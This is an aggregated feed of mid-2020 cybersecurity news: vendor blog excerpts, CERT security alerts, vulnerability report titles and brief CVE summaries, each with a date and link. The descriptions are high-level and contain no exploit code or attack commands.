https://www.catonetworks.com/resources/catos-sales-engineers-demo-interview-video-series-sylvain-chareyre/
FIRST POST: Summer 2020
2020-07-06T00:00:00Z | 1593993600

2020 Agm & Election. 2020 Conference update and impact of Covid-19. First 2020 CTI Symposium in Switzerland moved online. First to Review the Traffic Light Protocol standard to increase global adoption. First updates coordination principles for Multi-Party Vulnerability Coordination and Disclosure. First and Mitre Engenuity partner to expand The Global Understanding of Adversary Behaviors. More new partnerships forged to make the internet safe for everyone. Virtual site visits currently available for new applicants. Critical VPN vulnerabilities show the need for proactive risk scanning. ISO and standards update. New breach workshop materials available. A new initiative to build trust. First infrastructure update Portal & SSO.

https://www.first.org/newsroom/newsletters/FIRST_summer_2020.pdf
High Threat Security Alert (A20-07-03): Multiple Vulnerabilities in F5 BIG-IP
2020-07-03T04:00:00Z | 1593748800

F5 has published security advisories to address multiple vulnerabilities in the Traffic Management User Interface (TMUI) of F5 BIG-IP system.

https://www.govcert.gov.hk/en/alerts_detail.php
Learn how to Best Plan your SASE Migration
2020-07-02T13:38:01Z | 1593697081

The post Learn how to Best Plan your SASE Migration appeared first on Cato Networks.

https://www.catonetworks.com/resources/learn-how-to-best-plan-your-sase-migration/
SASE: The Architecture for the New Enterprise Perimeters
2020-07-02T11:51:55Z | 1593690715

The post SASE: The Architecture for the New Enterprise Perimeters appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-the-architecture-for-the-new-enterprise-perimeters/
Security Alert (A20-07-01): Multiple Vulnerabilities in Firefox
2020-07-02T04:00:00Z | 1593662400

Mozilla has published two security advisories (MFSA 2020-24 and MFSA 2020-25) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-07-02): Vulnerability in Palo Alto PAN-OS
2020-07-02T04:00:00Z | 1593662400

Palo Alto has published a security advisory to address a Security Assertion Markup Language (SAML) authentication vulnerability in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Taking a Human Approach to a Global Crisis
2020-07-02T04:00:00Z | 1593662400

Since March, the COVID crisis has caused massive disruption to every area of life and work. It has tested us, as individuals and as a business. Akamai has taken a very human-centric approach during the pandemic. Our guiding principle has been to do what is right for the health and safety of employees, customers and partners. I feel proud of this, because when I think about what I'm grateful for, it really does come down to people. I'm grateful to be working for a company that is keeping people connected to the world through technology. I'm grateful to be among smart, immensely resilient colleagues. And I'm grateful to have friends and family who are sticking together. Ultimately, it's the humanity that matters.

https://www.akamai.com/blog/culture/taking-a-human-approach-to-a-global-crisis-by-prasad-mandava
Google Chrome PDFium Javascript Regexp Memory Corruption Vulnerability
2020-07-02T00:00:00Z | 1593648000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1044
Mozilla Firefox URL mPath Information Disclosure Vulnerability
2020-07-01T00:00:00Z | 1593561600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1088
Leadtools Image Parser Animated Icon Code Execution Vulnerability
2020-07-01T00:00:00Z | 1593561600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1009
Why SASE is the Right Architecture to Replace your Telco MNS
2020-06-30T13:00:30Z | 1593522030

The post Why SASE is the Right Architecture to Replace your Telco MNS   appeared first on Cato Networks.

https://www.catonetworks.com/resources/why-sase-is-the-right-architecture-to-replace-your-telco-mns/
Tools for processing Certificate Transparency Log data of "certspotter" published
2020-06-30T10:12:10Z | 1593511930

The Austrian Energy CERT and the GovCERT Austria monitor the Certificate Transparency Logs ("CTL") for their constituents' domains. These Logs contain any newly issued server certificates and monitoring those lists allows for timely detection of abuse. Our processing chain of this data involves several steps which can be useful for other CERTs and security teams. Our experience gained on the processing of this kind of data as well as code will also be incorporated in the further development of IntelMQ. The tools are published on our GitHub page. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/6/tools-for-processing-certificate-transparency-log-data-of-certspotter-published
RIS infokiri – juuni 2020
2020-06-29T07:12:56Z | 1593414776

Riigi infosüsteemi infokirjas on juttu, kuidas toimis e-riik kriisi ajal RIA ja teiste riigi IT-majade perspektiivist. Lisaks kirjutatakse uue valimiste infosüsteemi (VIS3) arendusest, Tallinnas toimuvast X-Roadi kogukonnaüritusest ning riigivõrgu seadmete vahetusest.

https://ria.ee/uudised/ris-infokiri-juuni-2020
Security Alert (A20-06-11): Vulnerability in Apache Tomcat
2020-06-29T04:00:00Z | 1593403200

Apache Software Foundation has released new versions of Apache Tomcat 8.5 and 9 to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Converged SD-WAN and Security for Global Manufacturers
2020-06-25T12:34:00Z | 1593088440

The post Converged SD-WAN and Security for Global Manufacturers appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-25
Largest Ever Recorded Packet Per Second-Based DDoS Attack Mitigated by Akamai
2020-06-25T04:00:00Z | 1593057600

On June 21, 2020, Akamai mitigated the largest packet per second (PPS) distributed denial-of-service (DDoS) attack ever recorded on the Akamai platform. The attack generated 809 million packets per second (Mpps), targeting a large European bank.

https://www.akamai.com/blog/news/largest-ever-recorded-packet-per-secondbased-ddos-attack-mitigated-by-akamai
How to Do Micro-Segmentation the Right Way
2020-06-24T13:24:00Z | 1593005040

Micro-segmentation is the central IT security best practice response to overly-permissive policies. Learn how to do it right.

https://www.akamai.com/blog/security/microsegmentation-done-right
Security Alert (A20-06-10): Multiple Vulnerabilities in VMware Products
2020-06-24T04:00:00Z | 1592971200

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA NVWGF2UMX_CFG.DLL shader functionality denial-of-service vulnerability
2020-06-24T00:00:00Z | 1592956800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0971
Cidadão Ciberinformado testa conhecimento acerca de desinformação
2020-06-23T00:00:00Z | 1592870400

Lisboa, 23 de junho, 2020 - Hoje é lançado o curso Cidadão Ciberinformado, que visa garantir um conjunto de competências que auxiliará os seus participantes a perceber melhor o termo fake news, entre outros conceitos, através de algumas dicas que o permitam, por exemplo, identificar a veracidade de uma notícia ou de outro tipo de informação publicada online.Trata-se do segundo curso online que o Centro Nacional de Cibersegurança (CNCS) desenvolve, desta vez em parceria com a LUSA.O curso é dirigido a todos os cidadãos que consultam informação online e pretende não só alertar para os perigos de um consumo de informação sem espírito crítico, como também, partilhar conhecimentos que ajudem os cidadãos a verificar se a informação que consultam na internet é verdadeira. Os objetivos de aprendizagem para todos os participantes passam por perceber o que são as fake news, como surgiram e como se propagam; compreender a importância do combate às fake news e como fazê-lo; verificar a veracidade de uma notícia ou informação online, e ainda, perceber porque devemos acreditar no jornalismo e não deixar de consumir informação online.No que respeita ao funcionamento do curso, este terá no total cerca de 3 horas, sendo que após a conclusão de todos os módulos, os participantes podem descarregar o respetivo Certificado de conclusão. Para isso, será apenas necessário responder a todas as atividades com uma percentagem mínima de 75% de opções corretas. Cada módulo contém diversos tópicos que são acompanhados por textos, vídeos e materiais de apoio, com conteúdos específicos sobre o tópico em causa. A inscrição no curso pode ser feita aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/612/cidadao-ciberinformado-testa-conhecimento-acerca-de-desinformacao
Akamai Mitigates Sophisticated 1.44 Tbps and 385 Mpps DDoS Attack
2020-06-22T20:37:00Z | 1592858220

always surprises me how easily a community can adapt to a new situation or reality. What was once considered an outlier or even an unimaginable situation can quickly become our new normal. For those of us focused on protecting enterprises from threats, that also couldn't be more accurate. Specifically for the Akamai team working on our Prolexic platform in our Security Operations Command Center (SOCC), mitigating many distributed denial-of-service (DDoS) attacks a day has resulted in increasingly sophisticated automated tooling and expert-level know-how through mitigating these constant attacks.

https://www.akamai.com/blog/security/akamai-mitigates-sophisticated-1-44-tbps-and-385-mpps-ddos-attack
Akamai Mitigates Sophisticated 1.44 Tbps and 385 Mpps DDoS Attack
2020-06-22T20:37:00Z | 1592858220

always surprises me how easily a community can adapt to a new situation or reality. What was once considered an outlier or even an unimaginable situation can quickly become our new normal. For those of us focused on protecting enterprises from threats, that also couldn't be more accurate. Specifically for the Akamai team working on our Prolexic platform in our Security Operations Command Center (SOCC), mitigating many distributed denial-of-service (DDoS) attacks a day has resulted in increasingly sophisticated automated tooling and expert-level know-how through mitigating these constant attacks.

https://www.akamai.com/blog/akamai-mitigates-sophisticated-1-44-tbps-and-385-mpps-ddos-attac
Eesti arvutikasutajad olid ka mais õngitsuskampaaniate hambus
2020-06-22T13:40:59Z | 1592833259

Kui varasemalt said ka Eesti arvutikasutajad suuremal hulgal pihta COVID-19 viiruse levikut või eriolukorda ära kasutavate petukirjadega, siis mais selliste intsidentide arv langes. Küll aga levisid internetipankade veebilehti jäljendavad õngitsuskirjad.

https://ria.ee/uudised/eesti-arvutikasutajad-olid-ka-mais-ongitsuskampaaniate-hambus
CVE-2020-12033
2020-06-22T00:00:00Z | 1592784000

IMPROPER INPUT VALIDATION CWE-20 The affected product's redundancy host service (RdcyHost.exe) does not validate supplied identifiers, which could allow an unauthenticated, adjacent attacker to execute remote COM objects with elevated privileges.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12033
DNS as Code
2020-06-20T04:21:00Z | 1592626860

Infrastructure as Code (IaC) and Continuous Delivery methods have become increasingly popular amongst development and operations teams as a means of maintaining high-performing websites.

https://www.akamai.com/blog/security/dns-as-code-
Hacking Starbucks and Accessing Nearly 100 Million Customer Records
2020-06-20T00:00:00Z | 1592611200

After a long day of trying and failing to find vulnerabilities on the Verizon Media bug bounty program I decided to call it quits and do some chores. I needed to buy gifts for a friends birthday and went online to order a Starbucks gift card.

https://samcurry.net/hacking-starbucks
CVE-2020-12015
2020-06-19T00:00:00Z | 1592524800

DESERIALIZATION OF UNTRUSTED DATA CWE-502 A specially crafted communication packet sent to the affected GENESIS64 Platform Services could cause a denial-of-service condition due to a deserialization issue.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12015
IntelMQ Releases 2.1.3 and 2.2.0
2020-06-18T13:29:57Z | 1592486997

On 26th of May we released the IntelMQ Maintenance Version 2.1.3 and on 18th June the Feature Release 2.2.0. Both versions include various changes, both error corrections and new functionality. We thank all contributors and members of the IntelMQ community for their participation in this community-led project. The Version 2.1.3 mainly fixes errors, for example it improved the error & exception handling and thus the usability. It further contains fixes in 12 bots and even more changes in the core, tests, documentation and supporting tools. Version 2.2.0 introduces several new bots and support for new feeds, including: Github API Collector, Github Feed Parser, CSV Converter Expert, MISP Expert, MISP Feed Output and MISP API Output. Other bots received major improvements: Microsoft Azure Collector, STOMP collector, AnubisNetworks Parser, Cymru Full Bogons Parser, Taichung Parser, Microsoft CTIP Parser, AMQP Output, ElasticSearch Output.More information on the Bots included in version 2.2.0 can be found in the Bots' documentation.The feature release also includes several changes in the common libraries and tools, enhancing contributions and usability. Due to discontinued data feeds, the support for seven feed groups/providers has been removed in these releases, which also resulted in the removal of six bots. Further, IntelMQ no longer supports Python version 3.4, which itself already reached it's "End Of Life". The documentation and installation instructions can be found on our Github repository. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/6/intelmq-releases-213-and-220
Ask me anything about SASE
2020-06-18T09:43:31Z | 1592473411

The post Ask me anything about SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-19
Security Alert (A20-06-09): Multiple Vulnerabilities in Drupal
2020-06-18T04:00:00Z | 1592452800

Drupal has released security advisories to address multiple vulnerabilities in Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
Advocating for change
2020-06-17T21:33:17Z | 1592429597

As a company, we believe Black lives matter. In the face of continued police brutality, racial disparities in law enforcement, and limited accountability, we demand an end to systemic racism, endorse restrictions on police use of force, and seek greater accountability for police actions. We believe police misconduct, militarization of police, and unchecked abuse of […]

https://blog.trailofbits.com/2020/06/17/advocating-for-change/
How to Prepare for Long-term Remote Work, Post-Pandemic
2020-06-16T07:59:34Z | 1592294374

Millions of people have been told to work from home (WFH) to support social distancing edicts during the pandemic. While many countries have now loosened their restrictions and allowed some workers to return to their places of employment, there are indications that WFH could be long-lasting or even permanent for some. In a March 30... The post How to Prepare for Long-term Remote Work, Post-Pandemic appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-prepare-for-long-term-remote-work-post-pandemic/
May bathed in spring sunshine, but cyber weather saw rainy skies
2020-06-15T11:27:47Z | 1592220467

Scams perpetrated in Posti's name made May’s cyber weather particularly rainy. In addition to subscription traps and phishing, the Posti scams could infect mobile phones with malware. Rays of sunshine came in the form of improved communications network performance and relatively few disturbances.

https://www.kyberturvallisuuskeskus.fi/en/news/may-bathed-spring-sunshine-cyber-weather-saw-rainy-skies
Did you receive a text message sent in Posti’s name? Be careful, as it may be a scam
2020-06-15T11:21:04Z | 1592220064

Phishing and subscription trap text messages are being sent in Posti’s name, including at least three different types of scams. Be careful when opening any links, as they may lead to malware, phishing or other scams. Take care not to enter your information on any websites whose authenticity you doubt.

https://www.kyberturvallisuuskeskus.fi/en/news/did-you-receive-text-message-sent-postis-name-be-careful-it-may-be-scam
Did you receive a text message sent in Posti’s name? Be careful, as it may be a scam
2020-06-15T11:21:04Z | 1592220064

Phishing and subscription trap text messages are being sent in Posti’s name, including at least three different types of scams. Be careful when opening any links, as they may lead to malware, phishing or other scams. Take care not to enter your information on any websites whose authenticity you doubt.

https://www.kyberturvallisuuskeskus.fi/en/news/did-you-receive-text-message-sent-postis-name-be-careful-it-may-be-scam
CVE-2020-14511
2020-06-15T00:00:00Z | 1592179200

STACK-BASED BUFFER OVERFLOW CWE-121 Malicious operation of the crafted web browser cookie may cause a stack-based buffer overflow in the system web server. Read more: Team82 Discovers Stack-Based Buffer Overflow Vulnerability in Industrial VPN Servers"

https://claroty.com/team82/disclosure-dashboard/cve-2020-14511
Upgradeable contracts made safer with Crytic
2020-06-12T11:50:52Z | 1591962652

Upgradeable contracts are not as safe as you think. Architectures for upgradeability can be flawed, locking contracts, losing data, or sabotaging your ability to recover from an incident. Every contract upgrade must be carefully reviewed to avoid catastrophic mistakes. The most common delegatecall proxy comes with drawbacks that we’ve catalogued before. Crytic now includes a […]

https://blog.trailofbits.com/2020/06/12/upgradeable-contracts-made-safer-with-crytic/
ECDSA: Handle with Care
2020-06-11T11:50:20Z | 1591876220

The elliptic curve digital signature algorithm (ECDSA) is a common digital signature scheme that we see in many of our code reviews. It has some desirable properties, but can also be very fragile. For example, LadderLeak was published just a couple of weeks ago, which demonstrated the feasibility of key recovery with a side channel […]

https://blog.trailofbits.com/2020/06/11/ecdsa-handle-with-care/
CVE-2020-11999
2020-06-11T00:00:00Z | 1591833600

IMPROPER INPUT VALIDATION CWE-20 An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to specify a filename to execute unauthorized code and modify files or data.

https://claroty.com/team82/disclosure-dashboard/cve-2020-11999-cve-2020-12001-cve-2020-12003-cve-2020-12005
High Threat Security Alert (A20-06-07): Multiple Vulnerabilities in Microsoft Products (June 2020)
2020-06-10T04:00:00Z | 1591761600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-06-08): Vulnerability in Adobe Flash Player
2020-06-10T04:00:00Z | 1591761600

Adobe has released security updates to address a vulnerability in Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Office Excel PivotField code execution vulnerability
2020-06-10T00:00:00Z | 1591747200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1027
WAGO PFC 200 Web-Based Management (WBM) Code Execution Vulnerability
2020-06-10T00:00:00Z | 1591747200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1010
Mozilla Firefox SharedWorkerService Code Execution Vulnerability
2020-06-10T00:00:00Z | 1591747200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1053
Microsoft Office Excel HTML and XML Table Code Execution Vulnerability
2020-06-10T00:00:00Z | 1591747200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1045
How to check if a mutex is locked in Go
2020-06-09T11:50:53Z | 1591703453

TL;DR: Can we check if a mutex is locked in Go? Yes, but not with a mutex API. Here’s a solution for use in debug builds. Although you can Lock() or Unlock() a mutex, you can’t check whether it’s locked. While it is a reasonable omission (e.g., due to possible race conditions; see also Why […]

https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/
Siemens LOGO! TDE service "DELETEPROG" Denial of Service Vulnerability
2020-06-09T00:00:00Z | 1591660800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1025
Siemens LOGO! TDE service "NFSAccess" Upload File Write Vulnerability
2020-06-09T00:00:00Z | 1591660800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1026
Siemens LOGO! TDE service "NFSAccess" Delete Denial of Service Vulnerability
2020-06-09T00:00:00Z | 1591660800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1024
CVE-2020-7586
2020-06-09T00:00:00Z | 1591660800

HEAP-BASED BUFFER OVERFLOW CWE-122 The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker with local access to cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7586
The Bondnet Army
2020-06-08T21:19:00Z | 1591651140

Guardicore Labs has recently picked up Bondnet, a botnet of thousands of compromised servers of varying power. Managed and controlled remotely, the Bondnet is currently used to mine different cryptocurrencies and is ready to be weaponized immediately for other purposes such as mounting DDoS attacks as shown by the Mirai Botnet. Among the botnet?s victims are high profile global companies, universities, city councils and other public institutions.

https://www.akamai.com/blog/security/the-bondnet-army
The Path of a Packet in Cato’s SASE Architecture
2020-06-07T19:20:04Z | 1591557604

The business environment is in a state of continuous change. So, too, are the supporting technologies that enable a business to rapidly shift priorities to adapt to new market conditions and customer trends. In particular, the emergence of cloud computing and user mobility have increased business agility, allowing rapid response to new opportunities. The network... The post The Path of a Packet in Cato’s SASE Architecture appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-path-of-a-packet-in-catos-sase-architecture/
Breaking the Solidity Compiler with a Fuzzer
2020-06-05T11:50:24Z | 1591357824

Over the last few months, we’ve been fuzzing solc, the standard Solidity smart contract compiler, and we’ve racked up almost 20 (now mostly fixed) new bugs. A few of these are duplicates of existing bugs with slightly different symptoms or triggers, but the vast majority are previously unreported bugs in the compiler. This has been […]

https://blog.trailofbits.com/2020/06/05/breaking-the-solidity-compiler-with-a-fuzzer/
FIRST Membership Application updated to enable virtual site visit
2020-06-04T20:00:00Z | 1591300800

FIRST suspended the requirement for a physical site visit for applying members until further notice. Sponsoring teams may conduct a virtual site visit.

https://www.first.org/membership/updates-202004
Security Alert (A20-06-06): Multiple Vulnerabilities in Cisco Products
2020-06-04T04:00:00Z | 1591243200

Cisco released 38 security advisories to address multiple vulnerabilities in Cisco products running Cisco IOS, IOS XE, IOS XR, NX-OS software and Cisco IOx application environment.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-06-03): Multiple Vulnerabilities in Firefox
2020-06-03T04:00:00Z | 1591156800

Mozilla has published two security advisories (MFSA 2020-20 and MFSA 2020-21) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A20-06-04): Vulnerability in Cisco Products
2020-06-03T04:00:00Z | 1591156800

Cisco released security advisory to address a vulnerability in Cisco NX-OS Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-06-05): Vulnerabilities in Android
2020-06-03T04:00:00Z | 1591156800

Google has released Android Security Bulletin June 2020 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Stealthworker: Golang-based Brute Force Malware Still an Active Threat
2020-06-03T04:00:00Z | 1591156800

By: Larry Cashdollar Malware that can target Windows and Linux systems was recently installed on my honeypot. After some investigation, I determined it to be similar to the malware discovered in February of 2019 by Malwarebytes, and later examined by...

https://www.akamai.com/blog/security/stealthworker-golang-based-brute-force-malware-still-an-active-threat
Zoom client application chat Giphy arbitrary file write
2020-06-03T00:00:00Z | 1591142400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055
Zoom Client Application Chat Code Snippet Remote Code Execution Vulnerability
2020-06-03T00:00:00Z | 1591142400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1056
Security Alert (A20-06-01): Vulnerability in Apple iOS and iPadOS
2020-06-02T04:00:00Z | 1591070400

Apple has released iOS 13.5.1 and iPadOS 13.5.1 to fix a security vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-06-02): Multiple Vulnerabilities in VMware Products
2020-06-02T04:00:00Z | 1591070400

VMware has published a security advisory to address a Time-of-check Time-of-use (TOCTOU) issue in the service opener, an issue in the shader functionality and a memory leak vulnerability in the VMCI module.

https://www.govcert.gov.hk/en/alerts_detail.php
Webkit fireEventListeners use-after-free vulnerability
2020-06-02T00:00:00Z | 1591056000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1214
How Can Organizations Improve Network Performance?
2020-06-01T13:23:10Z | 1591017790

Often, when speaking with network managers responsible for infrastructure within a multinational or global enterprise, I hear first-hand accounts of the impact of sluggish network performance. For example, videoconferences between engineers and product managers on separate contents can be brought to a standstill because of packet loss or latency. Similarly, slow networks can lead to... The post How Can Organizations Improve Network Performance? appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-can-organizations-improve-network-performance/
VMware Workstation 15 shader functionality round_ni denial of service vulnerability
2020-06-01T00:00:00Z | 1590969600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0957
Detecting Bad OpenSSL Usage
2020-05-29T11:50:06Z | 1590753006

OpenSSL is one of the most popular cryptographic libraries out there; even if you aren’t using C/C++, chances are your programming language’s biggest libraries use OpenSSL bindings as well. It’s also notoriously easy to mess up due to the design of its low-level API. Yet many of these mistakes fall into […]

https://blog.trailofbits.com/2020/05/29/detecting-bad-openssl-usage/
My Advice For Candidates During the COVID-19 Environment
2020-05-29T04:00:00Z | 1590724800

Kerry Condon is Global Head of Talent Acquisition at Akamai Technologies. With more than 20 years' experience as a strategic human resources leader across emerging and developed markets, she shares her take on how candidates can put their best foot forward during these unusual times.

https://www.akamai.com/blog/culture/my-advice-for-candidates-during-the-covid-19-environment
Banks Prioritizing Microsegmentation
2020-05-27T13:00:00Z | 1590584400

Learn how microsegmentation allows financial institutions to achieve goals, from automation to streamlining firewall compliance, while protected.

https://www.akamai.com/blog/security/why-banks-should-prioritize-microsegmentation
Verifying Windows binaries, without Windows
2020-05-27T11:50:31Z | 1590580231

TL;DR: We’ve open-sourced a new library, μthenticode, for verifying Authenticode signatures on Windows PE binaries without a Windows machine. We’ve also integrated it into recent builds of Winchecksec, so that you can use it today to verify signatures on your Windows executables! As a library, μthenticode aims to be a breeze to integrate: It’s written […]

https://blog.trailofbits.com/2020/05/27/verifying-windows-binaries-without-windows/
Security Alert (A20-05-06): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-05-27T04:00:00Z | 1590552000

Apple has released iOS 12.4.7, iOS 13.5 and iPadOS 13.5 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Watch Your Step: The Prevalence of IDN Homograph Attacks
2020-05-27T04:00:00Z | 1590552000

The internationalized domain name (IDN) homograph attack is used to form domain names that visually resemble legitimate domain names, albeit, using a different set of characters [1]. For example, the IDN

https://www.akamai.com/blog/security/watch-your-step-the-prevalence-of-idn-homograph-attacks
Record 0-Second SLA PPS Mitigation
2020-05-26T21:14:00Z | 1590527640

On May 2, 2020, Akamai blocked a large PPS-focused attack against one of our financial services customers in 0 seconds, utilizing a proactive mitigation posture. This was one of the largest PPS levels we have on record, and the biggest mitigated to date in 0 seconds. The attacker launched a bevy of minimally sized UDP packets in an attempt to overwhelm network gear in the customer's data center.

https://www.akamai.com/blog/security/record-0-second-sla-pps-mitigation
Malicious macros are still causing problems!
2020-05-26T10:53:06Z | 1590490386

Andrew A explains the updated guidance for Microsoft Office macros

https://www.ncsc.gov.uk/blog-post/malicious-macros-are-still-causing-problems
Vulnerabilities made the cyber weather of April stormy
2020-05-26T09:44:49Z | 1590486289

Many well-known phenomena reared their heads with either their amount of incidents or their advanced modes of operation in April. The number of Office 365 data breaches that dropped earlier rose to the same level as it was in the beginning of the year. The hijacked accounts and the lost password reset functionality make it possible for criminals to access also other services. Many critical vulnerabilities were also published in April.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerabilities-made-cyber-weather-april-stormy
Vulnerabilities made the cyber weather of April stormy
2020-05-26T09:44:49Z | 1590486289

Many well-known phenomena reared their heads with either their amount of incidents or their advanced modes of operation in April. The number of Office 365 data breaches that dropped earlier rose to the same level as it was in the beginning of the year. The hijacked accounts and the lost password reset functionality make it possible for criminals to access also other services. Many critical vulnerabilities were also published in April.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerabilities-made-cyber-weather-april-stormy
WhatsApp accounts’ verification codes are being phished in Finland
2020-05-26T09:33:46Z | 1590485626

WhatsApp accounts’ verification codes are being phished in Finland. It is important that WhatsApp users recognise phishing attempts of verification codes sent by SMS and protect themselves against phishing attempts by starting to use two-step authentication. A successful hijack attempt leads to the takeover of the WhatsApp account, in which case the attacker continues to attempt phishing on the contact information of the hijacked account. Never share your own WhatsApp verification code with others.

https://www.kyberturvallisuuskeskus.fi/en/news/whatsapp-accounts-verification-codes-are-being-phished-finland
WhatsApp accounts’ verification codes are being phished in Finland
2020-05-26T09:33:46Z | 1590485626

WhatsApp accounts’ verification codes are being phished in Finland. It is important that WhatsApp users recognise phishing attempts of verification codes sent by SMS and protect themselves against phishing attempts by starting to use two-step authentication. A successful hijack attempt leads to the takeover of the WhatsApp account, in which case the attacker continues to attempt phishing on the contact information of the hijacked account. Never share your own WhatsApp verification code with others.

https://www.kyberturvallisuuskeskus.fi/en/news/whatsapp-accounts-verification-codes-are-being-phished-finland
The Latest Cyber Attacks Demonstrate the Need to Rethink Cybersecurity
2020-05-24T20:05:00Z | 1590350700

Cyberattacks are on the rise and more and more enterprises fall victim to attacks each and every day. Take for example the recent high profile attacks on Gedia, a German automotive parts manufacturer and Travelex, a foreign currency exchange enterprise. Both businesses experienced disruption and claimed the attacks came from a known criminal group. The... The post The Latest Cyber Attacks Demonstrate the Need to Rethink Cybersecurity appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-latest-cyber-attacks-demonstrate-the-need-to-rethink-cybersecurity/
Emerging Talent: Winternship 2020 Highlights
2020-05-22T11:50:14Z | 1590148214

The Trail of Bits Winternship is our winter internship program where we invite 10-15 students to join us over the winter break for a short project that has a meaningful impact on information security. They work remotely with a mentor to create or improve tools that solve a single impactful problem. These paid internships give […]

https://blog.trailofbits.com/2020/05/22/emerging-talent-winternship-2020-highlights/
Security Alert (A20-05-05): Multiple Vulnerabilities in Drupal
2020-05-22T04:00:00Z | 1590120000

Drupal has released security advisories to address cross site scripting and open redirect vulnerabilities in the jQuery library and the “drupal_goto” function of Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
Reinventing Vulnerability Disclosure using Zero-knowledge Proofs
2020-05-21T11:50:27Z | 1590061827

We, along with our partner Matthew Green at Johns Hopkins University, are using zero-knowledge (ZK) proofs to establish a trusted landscape in which tech companies and vulnerability researchers can communicate reasonably with one another without fear of being sabotaged or scorned. Over the next four years, we will push the state of the art in […]

https://blog.trailofbits.com/2020/05/21/reinventing-vulnerability-disclosure-using-zero-knowledge-proofs/
Epson EB-1470Ui ESPON Web Control Authentication Bypass Vulnerability
2020-05-21T00:00:00Z | 1590019200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1011
GNU glibc ARMv7 memcpy() memory corruption vulnerability
2020-05-21T00:00:00Z | 1590019200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019
CVE-2020-7496
2020-05-21T00:00:00Z | 1590019200

ARGUMENT INJECTION CWE-88 A remote attacker can trick a victim to open a specially crafted project file and gain unauthorized write access to the target system.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7496
CVE-2020-7495
2020-05-21T00:00:00Z | 1590019200

PATH TRAVERSAL CWE-22 An attacker could exploit this path traversal vulnerability by getting a user to visit a malicious page or open a malicious file.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7495
Advanced Network Security Technologies
2020-05-20T19:31:07Z | 1590003067

Since the release of Gartner’s Market Guide for Zero Trust Network Access (ZTNA) last April, ZTNA has been one of the biggest buzzwords in network security, and for good reason. A policy of zero trust helps enterprises limit exposure to the myriad of threats facing the modern network. However, ZTNA alone isn’t enough to maintain... The post Advanced Network Security Technologies appeared first on Cato Networks.

https://www.catonetworks.com/blog/advanced-network-security-technologies/
Security Alert (A20-05-04): Vulnerability in ISC BIND
2020-05-20T04:00:00Z | 1589947200

A vulnerability was found in Internet Systems Consortium (ISC) BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
5 IT Projects to Save Money and Improve Your Productivity
2020-05-19T08:35:47Z | 1589877347

The post 5 IT Projects to Save Money and Improve Your Productivity appeared first on Cato Networks.

https://www.catonetworks.com/resources/5-it-projects-to-save-money-and-improve-your-productivity/
Doing Our Bit to Defend Essential Services
2020-05-19T04:37:35Z | 1589863055

COVID-19 has put pressure on staff, business operations, and investments. To help offload some of that stress, we’ re giving a three-month license of our perimeter deception solution to essential services organisations for free.

https://www.smokescreen.io/covid-19-essential-services/
CVE-2020-12038
2020-05-19T00:00:00Z | 1589846400

